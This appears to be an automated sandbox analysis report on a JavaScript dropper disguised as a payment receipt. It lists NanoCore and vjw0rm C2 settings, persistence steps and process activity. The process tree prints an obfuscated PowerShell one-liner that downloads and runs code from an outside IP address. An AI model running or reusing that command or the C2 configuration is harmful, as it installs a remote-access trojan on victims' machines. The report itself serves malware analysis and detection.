Analysis
-
max time kernel
150s -
max time network
170s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
28-10-2021 15:41
Static task
static1
Behavioral task
behavioral1
Sample
d2h8_Payment_receipt.js
Resource
win7-en-20210920
General
-
Target
d2h8_Payment_receipt.js
-
Size
81KB
-
MD5
b28995f906c68033265eddd4465f25aa
-
SHA1
e96cd013b328a7740b2a73c3da0efe92d479f491
-
SHA256
1462ec0ee24166bb000751db97514da4e7bd875fb960499ceefaa2142ec34649
-
SHA512
395cde1555290656f88c35bea231b90336c8918685fbf9d6f9223c0c96f2cdfd984f8e085f669ce34d9e8318b275aecebe55ef614db3b8edbefa917007d9b62d
Malware Config
Extracted
http://13.78.209.105/E/err.txt
Extracted
nanocore
1.2.2.0
kenimaf.duckdns.org:8090
543e7469-d950-4ec2-a110-de54f8d16167
-
activate_away_mode
true
-
backup_connection_host
kenimaf.duckdns.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-08-01T06:39:50.225932136Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
8090
-
default_group
kenn
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
543e7469-d950-4ec2-a110-de54f8d16167
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
kenimaf.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
vjw0rm
http://6200js.duckdns.org:6200
Signatures
-
suricata: ET MALWARE Possible NanoCore C2 60B
suricata: ET MALWARE Possible NanoCore C2 60B
-
Blocklisted process makes network request 3 IoCs
Processes:
wscript.exepowershell.exeflow pid process 11 972 wscript.exe 25 1116 powershell.exe 26 1116 powershell.exe -
Drops startup file 2 IoCs
Processes:
wscript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d2h8_Payment_receipt.js wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d2h8_Payment_receipt.js wscript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
wscript.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\BB4HJP0E1C = "'C:\\Users\\Admin\\AppData\\Local\\Temp\\d2h8_Payment_receipt.js'" wscript.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run wscript.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1116 set thread context of 3564 1116 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
wscript.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings wscript.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exeaspnet_compiler.exepid process 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 3564 aspnet_compiler.exe 3564 aspnet_compiler.exe 3564 aspnet_compiler.exe 3564 aspnet_compiler.exe 3564 aspnet_compiler.exe 3564 aspnet_compiler.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
aspnet_compiler.exepid process 3564 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 1116 powershell.exe Token: SeDebugPrivilege 3564 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
wscript.exeWScript.exepowershell.exedescription pid process target process PID 972 wrote to memory of 3420 972 wscript.exe schtasks.exe PID 972 wrote to memory of 3420 972 wscript.exe schtasks.exe PID 972 wrote to memory of 2440 972 wscript.exe WScript.exe PID 972 wrote to memory of 2440 972 wscript.exe WScript.exe PID 2440 wrote to memory of 1116 2440 WScript.exe powershell.exe PID 2440 wrote to memory of 1116 2440 WScript.exe powershell.exe PID 1116 wrote to memory of 3564 1116 powershell.exe aspnet_compiler.exe PID 1116 wrote to memory of 3564 1116 powershell.exe aspnet_compiler.exe PID 1116 wrote to memory of 3564 1116 powershell.exe aspnet_compiler.exe PID 1116 wrote to memory of 3564 1116 powershell.exe aspnet_compiler.exe PID 1116 wrote to memory of 3564 1116 powershell.exe aspnet_compiler.exe PID 1116 wrote to memory of 3564 1116 powershell.exe aspnet_compiler.exe PID 1116 wrote to memory of 3564 1116 powershell.exe aspnet_compiler.exe PID 1116 wrote to memory of 3564 1116 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\d2h8_Payment_receipt.js1⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\Admin\AppData\Local\Temp\d2h8_Payment_receipt.js2⤵
- Creates scheduled task(s)
PID:3420
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\07AMQQVOE5.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $H ='http://13.78.209.105/E/err.txt';$H1 = '******************^^^^^^^^^^^^^^^^^^``````````````'.Replace('******************','n').Replace('^^^^^^^^^^^^^^^^^^','E').Replace('``````````````','t');$H2 ='DDDDDDDDEEEEEEEEEEE'.Replace('DDDDDDDD','.').Replace('EEEEEEEEEE','W');$H4 ='NNNNNNNNNNNNNNNNTTTTTTTTTTNT'.Replace('NNNNNNNNNNNNNNNNTTTTTTTTTT','IE');$H3 ='LLLLLLLLLL'.Replace('LLLLLLLLL','bC');$HH =$H1+$H2+$H3+$H4;$HHH ='DO---------------nG'.Replace('---------------','WnLoaDSTrI');$HHHH ='I`---------------Ec++++++++++++++H).$HHH($H)'.Replace('`---------------','EX(ne`W`-Obj`').Replace('++++++++++++++','`T $H');&('I'+'EX')($HHHH -Join '')|&('I'+'EX');3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3564
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
2b137d3d2ea7ddba63e99586f44e0388
SHA1d4634061943a78624880537ffa65472fc6195474
SHA2561af97b7b7febcf25481d8c653b141681be8a1cad29a563e9057c02c1c87b75c2
SHA5126a7240273576e625066b114960fa4063acd9404727d02bcd3183248f5c820161ec15fafe01858d22ddcf39cd4d03f8e52988625aabd7b01565339b8927693115